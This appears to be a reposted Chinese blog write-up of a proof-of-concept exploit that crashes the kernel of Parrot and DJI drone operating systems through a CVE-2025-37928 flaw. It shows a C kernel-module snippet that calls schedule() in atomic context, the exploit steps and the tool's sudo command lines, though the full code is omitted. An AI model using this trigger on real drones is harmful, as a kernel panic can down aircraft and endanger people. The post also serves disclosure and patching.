Parrot和DJI系列无人机操作系统内核崩溃漏洞利用分析

Parrot和DJI系列无人机操作系统 - 内核崩溃漏洞利用

漏洞概述

  • CVE编号: CVE-2025-37928
  • 漏洞类型: 本地权限提升/内核崩溃
  • 影响系统: 基于Linux的无人机操作系统(Parrot和DJI变种)
  • CVSS v3.1评分: 7.3(重要)
  • 弱点类型: CWE-284(不当访问控制)
  • 攻击向量: 本地
  • 用户交互: 无
  • 影响范围: 通过内核崩溃导致拒绝服务(高影响)

受影响版本

  • Parrot QRD
  • Parrot Alpha-M (DT)
  • DJI QRD
  • DJI Alpha-M (DT)

技术原理

该PoC通过在原子上下文中调用schedule()函数触发内核崩溃,利用了Linux内核中的访问控制缺陷。核心漏洞代码位于自定义内核模块中:

static void trigger_panic_tasklet(unsigned long data)
{
    pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n");
    schedule(); // 这会导致内核崩溃
}

利用步骤

  1. 检查root权限
  2. 验证内核版本漏洞
  3. 从系统文件检测无人机类型
  4. 构建并加载漏洞内核模块
  5. 通过在原子上下文中调度调用schedule()的tasklet触发内核崩溃

PoC使用说明

# 检测环境(不实际触发)
sudo python3 cve_2025_37928_tool.py --dry-run

# 强制触发漏洞(即使内核版本未明确标记为易受攻击)
sudo python3 cve_2025_37928_tool.py --force

# 仅清理模块
sudo python3 cve_2025_37928_tool.py --cleanup-only

完整PoC代码

#!/usr/bin/env python3
# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit
# Author: Mohammed Idrees Banyamer
[...完整Python代码...]

安全建议

  • 及时更新无人机操作系统内核
  • 在非测试环境中谨慎使用该PoC
  • 关注厂商发布的安全补丁
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    公众号二维码
posted @ 2025-07-21 09:01  qife  阅读(19)  评论(0)    收藏  举报